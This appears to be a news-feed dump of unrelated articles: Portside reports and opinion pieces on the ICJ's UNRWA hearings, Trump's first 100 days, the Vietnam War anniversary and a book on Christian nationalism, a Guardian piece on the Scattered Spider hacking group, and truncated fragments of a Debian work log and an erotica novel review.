Mark Brody
Thu, 05/01/2025 - 01:38
...
As the International Court of Justice this week weighs an Israeli ban on a United Nations agency that provides lifesaving aid in
Gaza
, the program's leader called out attacks on its workers while the United States defended Israel—the recipient of billions of dollars in U.S. military assistance.
The ICJ is holding a week of
hearings
in The Hague, Netherlands following the U.N. General Assembly's December
passage
of a Norwegian-led resolution asking the tribunal, which is also known as the World Court, for an advisory opinion on Israel's legal obligation to "ensure and facilitate the unhindered provision of urgently needed supplies essential to the survival of the Palestinian civilian population."
Among the 38 nations and three regional blocs scheduled to address the 15 ICJ judges, only the United States and Hungary have so far defended
Israel
, whose forces have
killed
nearly 300 United Nations Relief and Works Agency for
Palestine
Refugees in the Near East (UNRWA) workers during their nearly 19-month annihilation of Gaza.
"An occupational power retains a margin of appreciation concerning which relief schemes to permit," U.S. State Department legal adviser Joshua Simmons argued before the court Wednesday, referring to Israel's 58-year occupation of Palestine, which the ICJ
ruled
an illegal form of apartheid in a June 2024 advisory opinion.
"Even if an organization offering relief is an impartial humanitarian organization, and even if it is a major actor, occupation law does not compel an occupational power to allow and facilitate that specific actor's relief operations," Simmons continued, noting "serious concerns about UNRWA's impartiality, including information that Hamas has used UNRWA facilities and that UNRWA staff participated in the October 7th terrorist attack against Israel" in 2023.
"Given these concerns, it is clear that Israel has no obligation to permit UNRWA specifically to provide humanitarian assistance," Simmons added. "UNRWA is not the only option for providing humanitarian assistance in Gaza."
In what UNRWA Commissioner-General Philippe Lazzarini
described
at the time as an act of "reverse due process," the agency fired nine employees in February 2024 following Israeli allegations that they were involved in the Hamas-led attack on Israel in which more than 1,100 Israelis were killed and 251 Israeli and foreign survivors were kidnapped.
Lazzarini admitted to terminating the staffers without due process or an adequate investigation of Israel's claims. A
subsequent probe
by the U.N. Office of Oversight Services "was not able to independently authenticate information used by Israel to support the allegations."
On Tuesday, Lazzarini
reminded
the world that "over 50 UNRWA staff—among them teachers, doctors, social workers—have been detained and abused" by Israeli forces since October 2023.
"They have been treated in the most shocking and inhumane way," he continued. "They reported being beaten up and used as human shields. They were subjected to sleep deprivation, humiliation, threats of harm to them and their families, and attacks by dogs. Many were subjected to forced confessions."
Those forced confessions spurred numerous nations including the United States to
cut off funding
to UNRWA. Almost all of the countries have since
restored
funding as Israel's claims have been debunked or questioned over a lack of evidence.
The U.S.—which has not restored funding for UNRWA—earlier this week
abandoned
its long-standing position that the body is immune from lawsuits, opening the door for cases by October 7 survivors and victims' relatives stemming from dubious claims of agency involvement in the attack.
In addition to accusing Israeli troops of torturing its staffers, UNRWA has also
documented
tortures allegedly suffered by Palestinians imprisoned by Israel, including interrupted drowning—also known as waterboarding—being shot in the knees with nail guns, sexual abuse of both men and women, and being
sodomized
with electric batons. The Israel Defense Forces is
investigating
dozens of in-custody deaths, many of them at the
notorious
Sde Teiman base in the Negev Desert.
While Israel's physical assault on Gaza has killed hundreds of UNRWA workers, its diplomatic war on the U.N. has seen the agency
banned
from operating in Palestine and U.N. Secretary-General António Guterres
declared
"persona non grata" in Israel after he
included Israel
on his 2024 "list of shame" of countries and armed groups that kill and injure children during wartime.
The U.S.-backed 572-day war waged by the far-right government of Israeli Prime Minister Benjamin Netanyahu—who is a
fugitive
from the International Criminal Court—has left more than 184,000 Palestinians dead, maimed, or missing in Gaza, according to the Gaza Health Ministry. Nearly all of the embattled enclave's more than 2 million people have been forcibly displaced and Israel's "complete siege" of the coastal strip has
fueled
widespread starvation and illness.
This week's ICJ hearing comes amid the tribunal's ongoing
genocide case
against Israel, which was brought by South Africa and is backed by dozens of nations either individually or via regional blocs. The court has
issued
three provisional orders in the case, all of which Israel has been
accused
of flouting.
Responding to the U.S. intervention in this week's ICJ hearings, Palestinian Ambassador to the Netherlands Ammar Hijazi
told
Middle East Eye
that "everybody knows that Israel is using humanitarian aid as a weapon of war and is starving the population in Gaza because of that."
U.N. agencies and international humanitarian groups have
warned
in recent days of the imminent risk of renewed famine in Gaza as food stocks run out.
"The U.S. intervention is very narrow in its scope, when it highlights the rights of an occupying power but ignores the so many layers of duties of that occupying power that Israel is in violation of," Hijazi added.
Among the countries defending UNRWA during Wednesday's ICJ session were Indonesia and Russia, which is currently waging a war against Ukraine. Indonesian Foreign Minister Sugiono affirmed "the Palestinian people's right to self-determination," while Maksim Musikhin, legal director of Russia's Foreign Ministry, argued that "international law should be respected by Israel" and that UNRWA deserves a Nobel Peace Prize.
The New Deal Is a Stinging Rebuke to Trump and Trumpism
Portside
portside.org
2025-05-01 06:25:42
The New Deal Is a Stinging Rebuke to Trump and Trumpism
Mark Brody
Thu, 05/01/2025 - 01:25
...
There is no question that Donald Trump’s ambition in the first 100 days of his return to the Oval Office was to set a new standard for presidential accomplishment. To rival, even surpass, the scope of Franklin Roosevelt’s efforts nearly a century ago, when he moved so quickly — and so decisively — that he established the first 100 days as a yardstick for executive action.
But as consequential as they have been, and as exhausting as they’ve felt to many Americans, these first months of Trump’s second term fall far short of what Roosevelt accomplished. Yes, Trump has wreaked havoc throughout the federal government and destroyed our relationships abroad, but his main goal — the total subordination of American democracy to his will — remains unfulfilled. You could even say it is slipping away, as he sabotages his administration with a ruinous trade war, deals with the stiff opposition of a large part of civil society and plummets in his standing with most Americans.
If measured by his ultimate aims, Trump’s first 100 days are a failure. To understand why he failed, we must do a bit of compare-and-contrast. First, let’s look at the details of Trump’s opening gambit. And second, let’s measure his efforts against the man who set the terms in the first place: Franklin Delano Roosevelt. To do so is to see that the first 100 days of Trump’s second term aren’t what we think they are. More important, it is to see that the ends of a political project cannot be separated from the means that are used to bring it into this world.
Trump began his
second term with a shock-and-awe campaign of executive actions. He, or rather the people around him, devised more than 100 executive orders, all part of a program to repeal the better part of the 20th century — from the New Deal onward — as well as fundamentally transform the relationship between the federal government and the American people.
His ultimate aim is to turn a constitutional republic centered on limited government and the rule of law into a personalist autocracy centered on the rule of one man, Donald J. Trump, and his unlimited authority. Trump’s vision for the United States, put differently, has more in common with foreign dictatorships than it does with almost anything you might find in America’s tradition of republican self-government.
To that end, the president’s executive orders are meant to act as royal decrees — demands that the country bend to his will. In one, among the more than four dozen issued in his first weeks in office, Trump purports to purge the nation’s primary and secondary schools of supposed “radical indoctrination” and promote a program of “patriotic education” instead. In another, signed in the flurry of executive activity that marked his first afternoon back in the Oval Office, Trump asserts the power to define “biological” sex and “gender identity” themselves, in an attempt to end official recognition of trans and other gender nonconforming people.
In Trump’s America, diversity, equity and inclusion programs aren’t just frowned upon; they’re grounds for purges in the public sector and investigations in the private sector. Scientific and medical research must align with his ideological agenda; anything that doesn’t — no matter how promising or useful — is on the chopping block. Any institutions that assert independent authority, like law firms and universities, must be brought to heel with the force of the state itself. Everything in American society must align with the president’s agenda. Those who disagree might find themselves at the mercy of his Department of Justice or worse, his deportation forces.
Trump claims sovereign authority. He claims the right to dismantle entire federal agencies, regardless of the law. He claims the right to spend taxpayer dollars as he sees fit, regardless of what Congress has appropriated. He even claims the right to banish American citizens from the country and send them to rot in a foreign prison.
Trump has deployed autocratic means toward authoritarian ends. And the results, while sweeping, rest on a shaky foundation of unlawful actions and potentially illegal executive actions.
Now, let’s
consider Roosevelt.
It’s from Roosevelt, of course, that we get the idea that the 100th day is a milestone worth marking.
Sign up for the Opinion Today newsletter Get expert analysis of the news and a guide to the big ideas shaping the world every weekday morning. Get it sent to your inbox.
Roosevelt took office at a time of deprivation and desperation. The Great Depression had reached its depths during the winter of his inauguration in March 1933. Total estimated national income
had dropped by half
, and the financial economy had all but shut down, with banks closed and markets frozen. About one-quarter of the nation’s work force — or close to 15 million people — was out of work. Countless businesses had failed. What little relief was available, from either public or private sources, was painfully inadequate.
“Now is the winter of our discontent the chilliest,” Merle Thorpe, the editor of Nation’s Business — then the national magazine of the U.S. Chamber of Commerce — wrote in an editorial that captured the mood of the country on the eve of Roosevelt’s inauguration. “Fear, bordering on panic, loss of faith in everything, our fellow-man, our institutions, private and government. Worst of all, no faith in ourselves, or the future. Almost everyone ready to scuttle the ship, and not even ‘women and children first.’”
It was this pall of despair that led Roosevelt to
tell the nation in his Inaugural Address
that “the only thing we have to fear is fear itself — nameless, unreasoning, unjustified terror which paralyzes needed efforts to convert retreat into advance.” Despite the real calls for someone to seize dictatorial power in the face of crisis, Roosevelt’s goal — more, possibly, than anything else — was to rescue and rejuvenate American democracy: to rebuild it as a force that could tame the destructive force of unregulated capitalism.
As such, the new president insisted, the country “must move as a trained and loyal army willing to sacrifice for the good of a common discipline.” His means would fit his ends. He would use democracy to save democracy. He would go to the people’s representatives with an ambitious plan of action. “These measures,” he said, “or such other measures as the Congress may build out of its experience and wisdom, I shall seek, within my constitutional authority, to bring to speedy adoption.”
What followed was a blitz of action meant to ameliorate the worst of the crisis. “On his very first night in office,” the historian William E. Leuchtenburg (
who died three months ago
) recounted in his seminal volume, “Franklin D. Roosevelt and the New Deal, 1932-1940,” Roosevelt “directed Secretary of the Treasury William Woodin to draft an emergency banking bill, and gave him less than five days to get it ready.”
Five days later, on March 9, 1933, Congress convened a special session during which it approved the president’s banking bill with a unanimous vote in the House and a nearly unanimous vote in the Senate. Soon after, Roosevelt urged the legislature to pass an unemployment relief measure. By the end of the month, on March 31, Congress had created the Civilian Conservation Corps.
This was just the beginning of a burst of legislative and executive activity. On May 12 alone, Roosevelt signed the Federal Emergency Relief Act — establishing the precursor to the Works Progress Administration — the Agricultural Adjustment Act and the Emergency Farm Mortgage Act. He signed the bill creating the Tennessee Valley Authority less than a week later, on May 18, and the Securities Act regulating the offer and sale of securities on May 27. On June 16, Roosevelt signed Glass-Steagall, a law regulating the banking system, and the National Industrial Recovery Act, an omnibus business and labor relations bill with a public works component. With that, and 100 days after it began, Congress went out of session.
The legislature, Leuchtenburg wrote,
had written into the laws of the land the most extraordinary series of reforms in the nation’s history. It had committed the country to an unprecedented program of government-industry cooperation; promised to distribute stupendous sums to millions of staple farmers; accepted responsibility for the welfare of millions of unemployed; agreed to engage in far-reaching experimentation in regional planning; pledged billions of dollars to save homes and farms from foreclosure; undertaken huge public works spending; guaranteed the small bank deposits of the country; and had, for the first time, established federal regulation of Wall Street.
And Roosevelt, Leuchtenburg continued, “had directed the entire operation like a seasoned field general.” The president even coined the “hundred days” phrasing, using it in a
July 24, 1933, fireside chat
on his recovery program, describing it as a period “devoted to the starting of the wheels of the New Deal.”
The frantic movement of Roosevelt’s first months set a high standard for all future presidents; all fell short. “The first 100 days make him look like a minor league statesman,” said one journalist of Roosevelt’s successor Harry S. Truman. The Times described the first 100 days of the Eisenhower administration as a “slow start.” And after John F. Kennedy’s first 100 days yielded few significant accomplishments, the young president let the occasion pass without remark.
There is much to be said about why Roosevelt was able to do so much in such a short window of time. It is impossible to overstate the importance of the crisis of the Depression. “The country was in such a state of confused desperation that it would have followed almost any leader anywhere he chose to go,” observed the renowned columnist and public intellectual Walter Lippmann. It also helped that there was no meaningful political opposition to either Roosevelt or the Democratic Party — the president took power with overwhelming majorities in the House and the Senate. The Great Depression had made the Republicans a rump party, unable to mount an effective opposition to the early stages of the New Deal.
This note on Congress is key. Beyond the particular context of Roosevelt’s moment, both the expectation and the myth of Roosevelt’s 100 days miss the extent to which it was a legislative accomplishment as much as an executive one. Roosevelt did not transform the United States with a series of executive orders; he did so with a series of laws.
Roosevelt was chief legislator as much as he was chief executive. “He wrote letters to committee chairmen or members of Congress to urge passage of his proposals, summoned the congressional leadership to White House conferences on legislation … and appeared in person before Congress,” Leuchtenburg wrote in an essay arguing that Roosevelt was “the first modern president”:
He made even the hitherto mundane business of bill signing an occasion for political theater; it was he who initiated the custom of giving a presidential pen to a congressional sponsor of legislation as a memento.
Or as the journalist Raymond Clapper wrote of Roosevelt at the end of his first term: “It is scarcely an exaggeration to say that the president, although not a member of Congress, has become almost the equivalent of the prime minister of the British system, because he’s both executive and the guiding hand of the legislative branch.”
Laws are never
fixed in place. But neither are they easily moved. It’s for this reason that any president who hopes to make a lasting mark on the United States must eventually turn to legislation. It is in lawmaking that presidents secure their legacy for the long haul.
This brings us back to Trump, whose desire to be a strongman has led him to rule like a strongman under the belief that he can impose an authoritarian system on the United States through sheer force of will.
His White House doesn’t just rely on executive orders; it revolves around them. They are the primary means through which the administration takes action (he has signed only five bills into law), under a radical assertion of executive power: the unitary executive taken to its most extreme form. And for Trump himself, they seem to define his vision of the presidency. He holds his ceremonies — always televised, of course — where subordinates present his orders as he gushes over them.
But while we have no choice but to recognize the significance of the president’s use of executive power, we also can’t believe the hype. Just because Trump desires to transform the American system of government doesn’t mean that he will. Autocratic intent does not translate automatically into autocratic success.
Remember, an executive order isn’t law. It is, as Philip J. Cooper explained in “By Order of the President: The Use and Abuse of Executive Direct Action,” a directive “issued by the president to officers of the executive branch, requiring them to take an action, stop a certain type of activity, alter policy, change management practices, or accept a delegation of authority under which they will henceforth be responsible for the implementation of law.” When devised carefully and within the scope of the president’s lawful authority, an executive order can have the force of law (provided the underlying statute was passed within the constitutional authority of Congress), but it does not carry any inherent authority. An executive order is not law simply because the president says it is.
Even though Trump seems to think he is issuing decrees, the truth is that his directives are provisional and subject to the judgment of the courts as well as future administrations. And if there is a major story to tell about Trump’s second term so far, it is the extent to which many of the president’s most sweeping executive actions have been tied up in the federal judiciary. The White House, while loath to admit it, has even had to back down in the face of hostile rulings.
The president might want to be a king, but despite the best efforts of his allies on the Supreme Court, the American system is not one of executive supremacy. Congress has all the power it needs to reverse the president’s orders and thwart his ambitions. Yes, the national legislature is held by the president’s party right now. But that won’t be a permanent state of affairs, especially given the president’s unpopularity.
MAGA propaganda notwithstanding, Trump is not some grand impresario skillfully playing American politics to his precise tune. He may want to bend the nation to his will, but he does not have the capacity to do the kind of work that would make this possible, as well as permanent — or as close to permanent as lawmaking allows. If Roosevelt’s legislative skill was a demonstration of his strength, then Trump’s reliance on executive orders is a sign of his weakness.
None of this
is to discount the real damage that he has inflicted on the country. It is precisely because Republicans in Congress have abdicated their duty to the Constitution that Trump has the capacity to act in catastrophically disastrous ways.
But the overarching project of the second Trump administration — to put the United States on the path toward a consolidated authoritarian state — has stalled out. And it has done so because Trump lacks what Roosevelt had in spades: a commitment to governance and a deep understanding of the system in which he operated.
Roosevelt could orchestrate the transformative program of his 100 days because he tied his plan to American government as it existed, even as he worked to remake it. Trump has pursued his by treating the American government as he wants it to be. It is very difficult to close the gap between those two things, and it will become all the more difficult as the bottom falls out of Trump’s standing with the public.
Do not take this as succor. Do not think it means that the United States is in the clear. American democracy is still as fragile and as vulnerable as it has ever been, and Trump is still motivated to make his vision a reality. He may even lash out as it becomes clear that he has lost whatever initiative he had to begin with. This makes his first 100 days less a triumph for him than a warning to the rest of us. The unthinkable, an American dictatorship, is possible.
But Trump may not have the skills to effect the permanent transformation of his despotic dreams. Despite the chaos of the moment, it is possible that freedom-loving Americans have gotten the luck of the draw. Our most serious would-be tyrant is also among our least capable presidents, and he has surrounded himself with people as fundamentally flawed as he is.
On Inauguration Day, Donald Trump seemed to be on top of the world. One hundred days later, he’s all but a lame duck. He can rage and he can bluster — and he will do a lot more damage — but the fact of the matter is that he can be beaten. Now the task is to deliver him his defeat.
Why April 30th Should Be a National Holiday
Portside
portside.org
2025-05-01 06:05:18
Why April 30th Should Be a National Holiday
Mark Brody
Thu, 05/01/2025 - 01:05
...
Vietnam Veterans Against the War Demonstrate at Arlington National Cemetery, 1971,
Fifty years ago today, on April 30, 1975, Vietnam defeated the United States of America.
It’s called “The Vietnam War” — but the Vietnamese call it, more accurately, “The American War.” Because it was the Americans who invaded Vietnam eleven years earlier to kill and dominate its people.
In those 11 years, we slaughtered
two million
Vietnamese and perhaps another
two million
southeast Asians in Cambodia and Laos and beyond. Nearly
4 million murdered
by the United States! (For context, that’s about two-thirds the number of Jews that the Germans killed in the Holocaust during World War II.)
Unlike the Germans, we, collectively as a nation, have
never
paid for these crimes against humanity. We have
never
admitted our guilt in this genocide,
never
apologized,
never
shown a speck of remorse,
never
made any reparations (and no, I don’t count the Nike factories).
And we have continued our policy of invasion and funding and arming genocide to this day. We funded and armed the slaughters in Central America well into the 1980s. We armed the Iraqis in their war with Iran. Then we spent over two decades bombing and eventually invading Iraq and slaughtering their people — while also losing a two-decade-long war with Afghanistan.
We do not tell our children, nor teach our students, the
real
truth of the atrocities we’ve conducted, from our first mass genocide of the Native Peoples of the Americas committed by our White Christian European ancestors, to currently the billions of our taxpayer dollars and tons of American bombs plus scores of fighter jets and other weapons of mass destruction being given to the Netanyahu regime in Israel to massacre tens of thousands of Palestinian civilians. And for the two million Palestinians still barely alive in Gaza, we now support a horrific plan to starve them to death, their homes now nearly all reduced to rubble (
92%
of Gaza has been flattened, according to the UN), with virtually no access to drinking water or medicine, and nearly every hospital, every school and every university bombed to smithereens. It will take years to discover under all the rubble what the real numbers of the dead are. And this doesn’t even take into account the daily attacks on the 3+ million Palestinians in the Occupied West Bank.
We
, you and I, are the backers of all this misery. Joe Biden bankrolled it. It cost him and Kamala Harris the election. Nearly a third —
29%
— of the millions of people who voted for Biden in 2020 but who
didn’t vote for Harris in 2024
cited their top reason as the Biden/Harris administration’s support for and funding of the war on Gaza. (This was more than those who cited the economy or immigration as their main reason). The media will not report it this way (
“It’s the price of eggs!”
), just as no media today on this 50th anniversary will state the simple truth that we, the mighty USA, were
defeated
in Vietnam by one of the poorest countries on Earth, a country which did not possess a single aircraft carrier, no destroyers, no B-52-style bombers — not even one goddamn attack helicopter! They did not have tank divisions, nor a single canister of napalm, no amphibious assault vehicles, not even one pathetic military Jeep that wasn’t a Soviet tin-can knock-off with maybe three wheels on it. They had
nothing
but the will of their own people to be free of the freedom-loving Americans.
They kicked the ass of a military superpower — and sent 60,000 of our young men home to us in wooden boxes (nine of them from my high school, two on my street) and hundreds of thousands more who returned without arms, legs, eyes or the mental capacity to live life to its fullest, forever affected, their souls crushed, their nightmares never-ending. All of them destroyed by a lie their own government told them about North Vietnam “attacking” us and the millions of Americans who at first believed the lie. This past November 5th showed just how easy it still is for an American president, a man who lies on an hourly basis, to get millions of his fellow citizens to fall for it.
That is why we need to make this day, April 30th, a national holiday. Usually, national holidays are used to celebrate victories and commemorate triumphs, like signing the Declaration of Independence or saving all the Indians from starving to death during winter (not true) or whatever Thanksgiving is all about. So why would we create a holiday to commemorate our
defeat
in Vietnam?
I think we need to do this for our children’s sake, for our grandchildren, for the sake of our future if there still is one for us. We should take just one day every year and participate in a national day of reckoning, recollection, reflection, and truth-telling, where together we actively seek forgiveness, make reparations and further our understanding of just how it happened and how easy it is for the wealthy and the political elites and the media to back such horror, and then to get the majority of the country to go along with it… at least at first. And how quickly after it’s over we decide that we never have to talk about it again. That we can learn nothing from it, and change nothing after it.
The best way to honor the loss from this tragic war is to commit to never doing it again — and that has to start by realizing we are doing it again
right now
.
Every bomb we send to Netanhayu is proof that we didn't learn a single lesson.
I encourage every one of you — whether you’ve seen it before or have never seen it — to watch the Oscar-winning Peter Davis documentary HEARTS & MINDS tonight or this coming weekend. It is the most powerful nonfiction film I have ever seen. You can watch it with any Max subscription or on the Criterion Channel. You can rent it on Apple TV+ or Amazon Prime.
Here is a short clip from from the film, featuring Daniel Ellsberg, who revealed the true scope of the war when he leaked the
Pentagon Papers
to the New York Times, showing how the U.S. government was lying about the war:
Ellsberg: “The question used to be: ‘Might it be possible that we were on the wrong side in the Vietnamese War?’ But we weren’t
on
the wrong side. We
are
the wrong side.”
And we
were
the wrong side again in Iraq. In Afghanistan. In Gaza. How did we get here? We got here because we’ve
always
been here. Start in 1492 and go forward.
Remember that.
Teach our children this truth about us. About our history. Give them this knowledge and with it comes the opportunity for us to change and make different choices for our future. To be a different people. A peaceful people. The Germans did it. The Japanese, too.
Today is a tragic and solemn day. And it should be a national holiday.
Vietnam’s largest military cemetery of war dead in Quang Tri province. The lens of the camera is not wide enough to capture the vastness of this sacred place.
Images by Steven Clevenger/Corbis via Getty Images; and HOANG DINH NAM / AFP via Getty Images
How ‘native English’ Scattered Spider group linked to M&S attack operate
Guardian
www.theguardian.com
2025-05-01 06:00:15
Cybersecurity expert says group are ‘unusual but potently threatening’ coalition of ransomware hackers If there is one noticeable difference between some members of the Scattered Spider hacking community and their ransomware peers, it will be the accent. Scattered Spider has been linked to a cyber-a...
If there is one noticeable difference between some members of the Scattered Spider hacking community and their ransomware peers, it will be the accent.
This helps with one of the techniques in their armoury that a Russian hack might struggle to replicate: ringing up company IT desks and gaining entry to systems by pretending to be employees, or pretending to be from company IT desks and calling employees.
“Native English authenticity can sometimes lead to an automatic sense of trust. There is a level of perceived familiarity that might cause personnel or even IT teams to lower their guard slightly,” says Nathaniel Jones, the vice-president of threat research at the cybersecurity firm Darktrace.
In November last year, the US Department of Justice gave an insight into Scattered Spider’s alleged personnel by charging five individuals over the targeting of unnamed American companies with “phishing” text messages.
The DoJ alleged that the accused sent fake texts to employees that tricked them into providing confidential information including their company logins. As a result sensitive data was then stolen – including intellectual property – as well as millions of dollars’ worth of cryptocurrency from people’s digital wallets.
All of the accused were in their 20s at the time they were charged. It charged four people in the US, their ages ranging from 20 to 25, as well as the Scottish 23-year-old Tyler Buchanan, who was deported to the US from Spain last week. He is due to appear in court in Los Angeles on 12 May.
The US cybersecurity agency revealed Scattered Spider’s IT desk gambit in a notice
published in 2023
.
Ransomware victims attributed to other Scattered Spider attacks include casino operators MGM Resorts and Caesars Entertainment who were hit in 2023. After that attack, West Midlands police announced last year it had arrested a 17-year-old in Walsall. West Midlands police has been contacted for an update on the case.
Scattered Spider was named as the alleged perpetrator of the M&S attack by
BleepingComputer
, a tech news site. BleepingComputer reported that the attackers then deployed a piece of malicious software-for-hire known as DragonForce to disable parts of the retailer’s IT network.
These attacks are known as ransomware attacks because the assailant then demands a substantial payment, typically in cryptocurrency, to restore access to affected computers. Using another gang’s ransomware is a common practice, known as a ransomware-as-a-service model, where the two entities involved share any proceeds.
Analysts at Recorded Future, a cybersecurity firm, said that Scattered Spider was more of an “umbrella term” than a centralised group of financially motivated cybercriminals – hence the “scattered” moniker. The analysts said it is not a “monolithic entity” and it originated in “The Com”, another loosely connected online community engaged in an array of criminal acts from sextortion to cyberstalking and payment card fraud.
“Members and affiliates of Scattered Spider gathered on platforms like Discord and Telegram, most often in closed, invite-only channels and groups,” Recorded Future analysts said.
Ciaran Martin, the ex-chief executive of the UK’s National Cyber Security Centre, said that Scattered Spider was a “rarity” given its non-Russian background.
“An overwhelming majority of ransomware groups are based in Russia. [Scattered Spider] are clearly not, though they seem to have hired Russian code for this attack in DragonForce. But it seems they’re based here and in the US. Hopefully that makes them arrestable. This is unusual,” said Martin, who is a professor at the Blavatnik school of government at the University of Oxford.
Martin added that Scattered Spider’s youthful notoriety should not detract from the threat. “They are a very unusual but potently threatening bunch,” he said.
Depictions of a White Jesus Uphold Violent Christian Nationalism, White Supremacy
Portside
portside.org
2025-05-01 05:36:24
Depictions of a White Jesus Uphold Violent Christian Nationalism, White Supremacy
Geoffrey
Thu, 05/01/2025 - 00:36
...
Disciples of White Jesus
The Radicalization of American Boyhood
Angela Denker
Broadleaf Books
ISBN: 9798889830757
Journalist and Lutheran pastor Angela Denker, herself the mother of sons, knows that boys can be affectionate, caring and sweet, but she also knows that they can be drawn to hate and violence.
Disciples of White Jesus: The Radicalization of American Boyhood,
Denker’s second book, probes the ways Christian nationalism is marketed to them and exposes the misogyny, racism, homophobia, transphobia and xenophobia that are its stock and trade.
Denker offers a masterful critique of the ways Christianity has helped foment right-wing religious movements, zeroing in on the blonde, blue-eyed Christ that is seen in most U.S. and European churches. She then juxtaposes this image with a more realistic portrait of the “historical, brown-skinned, Middle Eastern, and Jewish Jesus.” The result of this literal whitewashing, she writes, is a “progenitor of the Christian industrial complex that brought us megachurches and celebrity preachers and
New York Times
bestsellers and the prosperity gospel and Donald Trump.”
Denker finds this appalling and effectively parses how these institutions manipulate language to appeal to young men; her depiction of the way hate is spread by well-dressed preachers, both in person and online, is chilling.
Denker found racism to be a linchpin that was reinforced by pervasive depictions of white Jesus, imagery that she believes leads believers to a reverential distortion.
Moreover, her findings reinforce the conclusions of other researchers: Many young white males gravitate to the right because they feel disempowered by feminism, movements for racial equity, and the changing demographics that will make the United States a less white and less Christian nation within the next few decades.
Dylann Storm Roof,
the 21-year-old white man who entered Mother Emmanuel African Methodist Episcopal Church in Charleston, South Carolina, and prayed with congregants at Bible study before taking out a gun and killing eight Black parishioners and their pastor in 2015, is a case in point. Roof, of course, is neither anomalous nor unique. As Denker reports, white men are responsible for the lion’s share of mass murders against Black people throughout the United States.
“Roof was radicalized online,” Denker writes, “and he was an active reader of and visitor to sites like the Council of Conservative Citizens … Roof mentioned the Council as part of his awakening in an unsigned 2,444-word manifesto on his website, which also included photos of himself taken with a self-timer at slavery-related sites across South Carolina.”
Roof’s evolution is fascinating, and Denker reveals that he not only lacked a “positive rooted identity” but struggled academically and socially. “He found his identity,” she writes, ”in hatred of others, and that identity of hatred festered and grew in social circles where people may have mentioned racism or prejudice but didn’t confront it … preferring to avoid uncomfortable topics or introspection.”
This sidestepping allowed Roof to cling to resentment and his presumed entitlement to an elevated place in a white, male-dominated Christian hierarchy. That this idea was supported by the right-wing Christian and white supremacist forums and websites he visited and videos he watched goes without saying. What’s more, Roof saw this messaging as gospel truth and was elated by the sense of belonging he found in a host of online communities.
These communities also fed him a hefty helping of toxic masculinity; Denker notes that Christian nationalist speakers and written materials hammer visible shows of emotion as unmanly, as if vulnerability is a surefire “recipe for disaster, a potential upheaval in a society that has placed white Christian men at the top of a teetering house of cards.”
For teetering men like Roof, it was far easier, and likely more pleasant, to turn his fury toward people he felt were getting more than they deserved than it would have been to probe his disquiet and pain. It’s a sad revelation and one that was repeatedly replayed in sites all over the country, from the Citadel Military College to the far-flung churches and youth ministries that Denker visited. Throughout, she found racism to be a linchpin that was reinforced by pervasive depictions of white Jesus, imagery that she believes leads believers to a reverential distortion. But there is an antidote: “Reminding young, white Christian boys and men that Jesus is not a white man forces them to take Jesus and put him into a seat often occupied by people who are oppressed and marginalized,” she writes, “and whose strength and power are seen more often as a deviant threat than as something to be emulated and admired.”
Despite many strengths, the book falters by not offering more than individualistic responses to the false depiction of the man Christians claim to revere. While one-to-one counseling and making a personal connection to boys who feel cast aside is essential, so too is confronting, opposing and organizing to stop the promotion of white male gender grievance, rivalry and white supremacy.
Denker wants all men and boys to learn to love and be open and respectful to both peers and strangers. It’s a laudable goal, and while there are no ready-made strategies to get us there, it will clearly take all of us to make Christian nationalist messaging unappealing to viewers, listeners and readers.
Focus
This month I didn't have any particular focus.
I just worked on issues in my info bubble.
Changes
swh-web:
set GitLab pipeline names
Debian wiki pages:
DebianRepository/Setup,
Exploits,
Hardware/Wanted
Issues
Features in
glab
New versions of
webext-browserpass
Review
Patches:
notmu...
Beyond Pain
is a science fiction dystopian erotic romance novel and
a direct sequel to
Beyond Control
.
Following the romance series convention, each book features new
protagonists who were supporting characters in the previous book. You
could probably start here if you wanted, but there are significant
spoilers here for earlier books in the series. I read this book as part of
the
Beyond Series Bundle (Books 1-3)
, which is what the sidebar
information is for.
Six has had a brutally hard life. She was rescued from an awful situation
in a previous book and is now lurking around the edges of the Sector Four
gang, oddly fascinated (as are we all) with their constant sexuality and
trying to decide if she wants to, and can, be part of their world. Bren is
one of the few people she lets get close: a huge bruiser who likes cage
fights and pain but treats Six with a protective, careful respect that she
finds comforting. This book is the story of Six and Bren getting to the
bottom of each other's psychological hangups while the O'Kanes start
taking over Six's former sector.
Yes, as threatened, I read another entry in the dystopian erotica series
because I keep wondering how these people will fuck their way into a
revolution. This is not happening very quickly, but it seems obvious that
is the direction the series is going.
It's been a while since I've reviewed one of these, so here's another
variation of the massive disclaimer: I think erotica is harder to review
than any other genre because what people like is so intensely personal and
individual. This is not even an attempt at an erotica review. I'm both
wholly unqualified and also less interested in that part of the book,
which should lead you to question my reading choices since that's a good
half of the book.
Rather, I'm reading these somewhat for the plot and mostly for the vibes.
This is not the most competent collection of individuals, and to the
extent that they are, it's mostly because the men (who are, as a rule,
charismatic but rather dim) are willing to listen to the women. What they
are good at is communication, or rather, they're good about banging their
heads (and other parts) against communication barriers until they figure
out a way around them. Part of this is an obsession with consent that goes
quite a bit deeper than the normal simplistic treatment. When you spend
this much time trying to understand what other people want, you have to
spend a lot of time communicating about sex, and in these books that means
spending a lot of time communicating about everything else as well.
They are also obsessively loyal and understand the merits of both
collective action and in making space for people to do the things that
they are the best at, while still insisting that people contribute when
they can. On the surface, the O'Kanes are a dictatorship, but they're run
more like a high-functioning collaboration. Dallas leads because Dallas is
good at playing the role of leader (and listening to Lex), which is
refreshingly contrary to how things work in the real world right now.
I want to be clear that not only is this erotica, this is not the sort of
erotica where there's a stand-alone plot that is periodically interrupted
by vaguely-motivated sex scenes that you can skim past. These people use
sex to communicate, and therefore most of the important exchanges in the
book are in the middle of a sex scene. This is going to make this novel,
and this series, very much not to the taste of a lot of people, and I
cannot be emphatic enough about that warning.
But, also, this is such a fascinating inversion. It's common in media for
the surface plot of the story to be full of sexual tension, sometimes to
the extent that the story is just a metaphor for the sex that the
characters want to have. This is the exact opposite of that: The sex is a
metaphor for everything else that's going on in the story. These people
quite literally fuck their way out of their communication problems, and
not in an obvious or cringy way. It's weirdly fascinating?
It's also possible that my reaction to this series is so unusual as to not
be shared by a single other reader.
Anyway, the setup in this story is that Six has major trust issues and
Bren is slowly and carefully trying to win her trust. It's a classic
hurt/comfort setup, and if that had played out in the way that this story
often does, Bren would have taken the role of the gentle hero and Six the
role of the person he rescued. That is not at all where this story goes.
Six doesn't need comfort; Six needs self-confidence and the ability to
demand what she wants, and although the way
Beyond Pain
gets her
there is a little ham-handed, it mostly worked for me. As with
Beyond Shame
, I felt like the moral of the story is that the O'Kane
men are just bright enough to stop doing stupid things at the last
possible moment. I think
Beyond Pain
worked a bit better than the
